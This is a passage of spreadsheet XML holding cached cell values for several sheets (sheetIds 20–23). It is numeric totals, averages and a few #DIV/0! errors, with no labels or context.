        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>149.664444444444</v>
          </cell>
          <cell r="S80">
            <v>2754.52027777778</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>32.8211500974659</v>
          </cell>
          <cell r="V80">
            <v>32.5132232976603</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>85.0235341281979</v>
          </cell>
          <cell r="Y80">
            <v>79.4479538834802</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>147.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3043.645</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>32.4301900584795</v>
          </cell>
          <cell r="V81">
            <v>35.925932483475</v>
          </cell>
          <cell r="W81" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X81">
            <v>281.291190028063</v>
          </cell>
          <cell r="Y81">
            <v>275.953276416928</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="20">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>357.98</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10092.585</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>1614.33000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>469</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>32115.1380000506</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>603</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4215.51</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>28914.5049999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>117.76</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5227.95</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>341</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>456</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>10751.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2958.99</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>7635.92300000002</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>278</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>3197.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>29</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3563.60600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000361</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24905838041431e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.14127423822715e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>15.030001</v>
          </cell>
          <cell r="R73">
            <v>17.91002</v>
          </cell>
          <cell r="S73">
            <v>5799.640361</v>
          </cell>
          <cell r="T73">
            <v>62.6250041666667</v>
          </cell>
          <cell r="U73">
            <v>3.73125416666667</v>
          </cell>
          <cell r="V73">
            <v>68.263186923258</v>
          </cell>
          <cell r="W73">
            <v>107.407178482557</v>
          </cell>
          <cell r="X73">
            <v>111.624107622448</v>
          </cell>
          <cell r="Y73">
            <v>238.905579269591</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.9e-10</v>
          </cell>
          <cell r="S76">
            <v>3.49e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.95833333333333e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10781544256121e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.08333333333333e-12</v>
          </cell>
          <cell r="V77">
            <v>59.5553201506605</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>2.24972222222222</v>
          </cell>
          <cell r="R79">
            <v>231.946944444444</v>
          </cell>
          <cell r="S79">
            <v>3869.50583333333</v>
          </cell>
          <cell r="T79">
            <v>9.3738425925926</v>
          </cell>
          <cell r="U79">
            <v>48.3222800925926</v>
          </cell>
          <cell r="V79">
            <v>45.545030994978</v>
          </cell>
          <cell r="W79">
            <v>116.458822076799</v>
          </cell>
          <cell r="X79">
            <v>101.419745176399</v>
          </cell>
          <cell r="Y79">
            <v>102.209692150613</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>4.08305555555556</v>
          </cell>
          <cell r="R80">
            <v>153.7475</v>
          </cell>
          <cell r="S80">
            <v>2758.60333333333</v>
          </cell>
          <cell r="T80">
            <v>17.0127314814815</v>
          </cell>
          <cell r="U80">
            <v>32.0307291666667</v>
          </cell>
          <cell r="V80">
            <v>32.4694365976146</v>
          </cell>
          <cell r="W80">
            <v>83.5158854343833</v>
          </cell>
          <cell r="X80">
            <v>84.9834956665962</v>
          </cell>
          <cell r="Y80">
            <v>79.4539748979254</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>147.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3043.645</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>30.8086805555556</v>
          </cell>
          <cell r="V81">
            <v>35.8244467984934</v>
          </cell>
          <cell r="W81" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X81">
            <v>281.291190028063</v>
          </cell>
          <cell r="Y81">
            <v>275.953276416928</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="21">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>543.28</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>9549.30500000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>3774.34000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>2545</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>33344.4780000506</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>3443</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5255.6</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>27101.9049999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>125.46</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5102.49</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>685</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>1109</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>10327.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>372</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2212.75</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>5795.17300000002</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>473</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>2724.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>142</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3421.60600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.1e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000362</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24882629107981e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>9.99999999999999e-6</v>
          </cell>
          <cell r="Y72">
            <v>9.14364640883978e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>41.910021</v>
          </cell>
          <cell r="S73">
            <v>5823.640362</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>8.31548035714286</v>
          </cell>
          <cell r="V73">
            <v>68.3525864084507</v>
          </cell>
          <cell r="W73">
            <v>157.264160113994</v>
          </cell>
          <cell r="X73">
            <v>137.760131401514</v>
          </cell>
          <cell r="Y73">
            <v>238.569124059519</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2e-10</v>
          </cell>
          <cell r="S76">
            <v>3.5e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.96825396825397e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10798122065728e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>12.15000000001</v>
          </cell>
          <cell r="R77">
            <v>12.15000000001</v>
          </cell>
          <cell r="S77">
            <v>5071.97000000012</v>
          </cell>
          <cell r="T77">
            <v>50.6250000000417</v>
          </cell>
          <cell r="U77">
            <v>2.41071428571627</v>
          </cell>
          <cell r="V77">
            <v>59.5301643192502</v>
          </cell>
          <cell r="W77">
            <v>17.42</v>
          </cell>
          <cell r="X77">
            <v>17.42</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>23.9997222222222</v>
          </cell>
          <cell r="R79">
            <v>255.946666666667</v>
          </cell>
          <cell r="S79">
            <v>3893.50555555556</v>
          </cell>
          <cell r="T79">
            <v>99.9988425925926</v>
          </cell>
          <cell r="U79">
            <v>50.7830687830688</v>
          </cell>
          <cell r="V79">
            <v>45.6984220135629</v>
          </cell>
          <cell r="W79">
            <v>99.4178173358488</v>
          </cell>
          <cell r="X79">
            <v>101.23202750573</v>
          </cell>
          <cell r="Y79">
            <v>102.192482923843</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>8.75</v>
          </cell>
          <cell r="R80">
            <v>162.4975</v>
          </cell>
          <cell r="S80">
            <v>2767.35333333333</v>
          </cell>
          <cell r="T80">
            <v>36.4583333333333</v>
          </cell>
          <cell r="U80">
            <v>32.2415674603175</v>
          </cell>
          <cell r="V80">
            <v>32.4806729264476</v>
          </cell>
          <cell r="W80">
            <v>78.2857142857143</v>
          </cell>
          <cell r="X80">
            <v>84.62284035139</v>
          </cell>
          <cell r="Y80">
            <v>79.4502810145915</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>1.5</v>
          </cell>
          <cell r="R81">
            <v>149.381666666667</v>
          </cell>
          <cell r="S81">
            <v>3045.145</v>
          </cell>
          <cell r="T81">
            <v>6.25</v>
          </cell>
          <cell r="U81">
            <v>29.6392195767196</v>
          </cell>
          <cell r="V81">
            <v>35.7411384976526</v>
          </cell>
          <cell r="W81">
            <v>248</v>
          </cell>
          <cell r="X81">
            <v>280.956900110455</v>
          </cell>
          <cell r="Y81">
            <v>275.93950698571</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="22">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>613.21</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>8936.09500000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>4831.20000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4190.67</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>33985.0080000506</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4915</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4025.42</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>27991.4849999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>1162</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>206.42</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6058.07</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>738</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>627</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>10438.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2538</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2223.73</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>6109.44300000001</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>254</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>2470.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>207.4</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3214.20600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>196.469999999999</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.2e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000363</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24859550561798e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>9.99999999999999e-6</v>
          </cell>
          <cell r="Y72">
            <v>9.14600550964187e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>65.910022</v>
          </cell>
          <cell r="S73">
            <v>5847.640363</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>12.4829587121212</v>
          </cell>
          <cell r="V73">
            <v>68.4414836493446</v>
          </cell>
          <cell r="W73">
            <v>201.299991612501</v>
          </cell>
          <cell r="X73">
            <v>160.897078747754</v>
          </cell>
          <cell r="Y73">
            <v>238.416163350503</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.1e-10</v>
          </cell>
          <cell r="S76">
            <v>3.51e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.97727272727273e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10814606741573e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>20.08000000001</v>
          </cell>
          <cell r="R77">
            <v>32.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5092.05000000012</v>
          </cell>
          <cell r="T77">
            <v>83.6666666667083</v>
          </cell>
          <cell r="U77">
            <v>6.10416666666856</v>
          </cell>
          <cell r="V77">
            <v>59.5979634831475</v>
          </cell>
          <cell r="W77">
            <v>17.26</v>
          </cell>
          <cell r="X77">
            <v>17.31</v>
          </cell>
          <cell r="Y77">
            <v>19.76</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>8</v>
          </cell>
          <cell r="R79">
            <v>263.946666666667</v>
          </cell>
          <cell r="S79">
            <v>3901.50555555556</v>
          </cell>
          <cell r="T79">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U79">
            <v>49.989898989899</v>
          </cell>
          <cell r="V79">
            <v>45.6636886183937</v>
          </cell>
          <cell r="W79">
            <v>102.875</v>
          </cell>
          <cell r="X79">
            <v>101.281824611033</v>
          </cell>
          <cell r="Y79">
            <v>102.19388241861</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>24</v>
          </cell>
          <cell r="R80">
            <v>186.4975</v>
          </cell>
          <cell r="S80">
            <v>2791.35333333333</v>
          </cell>
          <cell r="T80">
            <v>100</v>
          </cell>
          <cell r="U80">
            <v>35.3214962121212</v>
          </cell>
          <cell r="V80">
            <v>32.6703339575531</v>
          </cell>
          <cell r="W80">
            <v>79.1666666666667</v>
          </cell>
          <cell r="X80">
            <v>83.9206959878819</v>
          </cell>
          <cell r="Y80">
            <v>79.4478425041139</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
            <v>157.381666666667</v>
          </cell>
          <cell r="S81">
            <v>3053.145</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>29.8071338383838</v>
          </cell>
          <cell r="V81">
            <v>35.734375</v>
          </cell>
          <cell r="W81">
            <v>274</v>
          </cell>
          <cell r="X81">
            <v>280.603268063836</v>
          </cell>
          <cell r="Y81">
            <v>275.934424994555</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="23">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>601.3975</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>8334.69750000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>4748.00000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>5283.315</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>33449.6930000507</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>5666</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4961.536</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>28695.9489999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>163.95</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5894.12</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>872</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>894.89</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>10416.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>4794</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2996.696</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>7906.74700000002</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>332</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>2138.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>146.45</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>233.8</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3126.85600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>896.315000000001</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.3e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000364</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.2483660130719e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>9.99999999999999e-6</v>
          </cell>
          <cell r="Y72">
            <v>9.14835164835165e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>89.910023</v>
          </cell>
          <cell r="S73">
            <v>5871.640364</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>16.2880476449275</v>
          </cell>
          <cell r="V73">
            <v>68.5298828664799</v>
          </cell>
          <cell r="W73">
            <v>197.833325090279</v>
          </cell>
          <cell r="X73">
            <v>170.756601852946</v>
          </cell>
          <cell r="Y73">
            <v>238.25028327297</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.2e-10</v>
          </cell>
          <cell r="S76">
            <v>3.52e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.98550724637681e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10830999066293e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>56.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5116.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>10.1865942029004</v>
          </cell>
